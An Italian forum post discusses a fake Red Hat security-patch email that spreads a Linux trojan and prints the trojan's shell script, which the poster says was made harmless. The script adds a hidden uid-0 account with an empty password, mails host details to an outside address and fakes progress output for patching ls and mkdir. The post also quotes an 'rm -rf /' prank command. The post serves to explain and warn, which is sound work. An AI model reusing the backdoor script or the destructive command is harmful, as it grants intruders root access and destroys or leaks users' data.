Quote:

Non solo Windows è al centro di continui attacchi da parte di hacker che sfruttano le sue vulnerabilità per diffondere virus e trojan, ora anche Linux si trova alle prese con lo stesso problema.
Infatti da alcuni giorni sta circolando una email, che si spaccia di essere un messaggio della security team RedHat, che invita gli utenti Linux ha scaricare una patch di sicurezza che sarebbe in grado di risolvere una falla nel binario Is e in mkdir.
Purtroppo però, se si effettua il download della finta patch, un trojan si installa nel sistema del "pc vittima" e permette a malintenzionati di entrare in possesso del sistema e danneggiarlo.
Ovviamente Red Hat ha smentito di essere il mittente di tale messaggio e di diffidare di queste finte email, visto che i loro messaggi di posta sono firmati digitalmente con GPG, la versione open source del conosciuto sofware PGP.

Link

questa è la notizia che appare in giro per la rete...

rimango sbalordito da come viene dipinta la faccenda...
Ora Linux è vulnerabile!!!
È infettabile da qualsiasi cosa..
ho visto/sentito persone, tirare conclusioni da paura...
nonono, non ci siamo

Quello che viene descritto in questi articoli è una cosa semplice: un virus per 'utonti'...
Ma per 'utonto' non intendo un newbe di linux, o un newbe in generale...
Appena si entra nel mondo linux ci si scontra con 'firme digitali', repositry di sicurezza, ml di sicurezza e cose del genere...

non vedo come sia possibile una email del genere...
per non scendere in flame inutili...lo stesso tipo di 'troian' esiste anche per Windows: nessuno ha mai ricevuto una email con un subject del tipo 'Important security upgrade!' da un certo 'MS team bla bla'?

Leggevo, mesi fa, un 3d in una mailing list..
era saltato fuori che l'unico modo per potre piallare un pc linux con una sorta di virus sia inviare una email come questa:
'Tips per le performance del tuo PC: esegui il comando rm -rf / da root, e vedrai che il tuo computer diventerà più performante'

in soldoni questa è più o meno la logica dei questo 'troian'...
una volta effettuato il download...deve essere l'utente ad eseguiro!!! _non_viene_eseguito_automaticamente_...

vi allego quello che è presente nel file allegato, così da capire cosa fa:

questo è il testo dello script, con alcune modifiche per renderlo innoquo (non eseguitelo)!
ovviamente lo script non è contenuto direttamente nel codice, ma è codificato in RC4!

#!/bin/sh<br />cd /tmp/<br />clear<br />if [ `id -u` != "0" ]<br />then<br />        echo "This patch must be applied as \"root\", and you are: \"`whoami`\""<br />        exit<br />fi<br />echo "Identifying the system. This may take up to 2 minutes. Please wait ..."<br />sleep 3<br /># edit<br />if [ -d /tmp/." "/." "/." "/." "/." "/." "/." "/." "/." " ]; then<br /> adduser -g 0 -u 0 -o bash >> /dev/null<br /> passwd -d bash >> /dev/null<br /> echo "Inca un root frate belea: " >> /tmp/mama<br /> ifconfig >> /tmp/mama<br /> uname -a >> /tmp/mama<br /> echo "user bash stii tu" >> /tmp/mama<br /> cat /tmp/mama | mail -s "Inca o roata" root@addlebrain.com<br /> rm -rf /tmp/mama<br /> mkdir -p /tmp/." "/." "/." "/." "/." "/." "/." "/." "/." "<br />fi<br /><br />bla()<br />{<br />  sleep 2<br />  echo -n "#"<br />  sleep 1<br />  echo -n "#"<br />  sleep 1<br />  echo -n "#"<br />  sleep 2<br />  echo -n "#"<br />  sleep 1<br />  echo -n "#"<br />  sleep 1<br />  echo -n "#"<br />  sleep 3<br />  echo -n "#"<br />  sleep 1<br />  echo -n "#"<br />  sleep 4<br />  echo -n "#"<br />  sleep 1<br />  echo -n "#"<br />  sleep 1<br />  echo "#"<br />  sleep 1<br />}<br /><br />echo "System looks OK. Proceeding to next step."<br />sleep 1<br />echo<br />echo -n "Patching \"ls\": "<br />bla<br />echo -n "Patching \"mkdir\": "<br />bla<br />echo<br />echo "System updated and secured successfuly. You may erase these files."<br />sleep 1

leggete il codice, e capirete che bella cosa fa...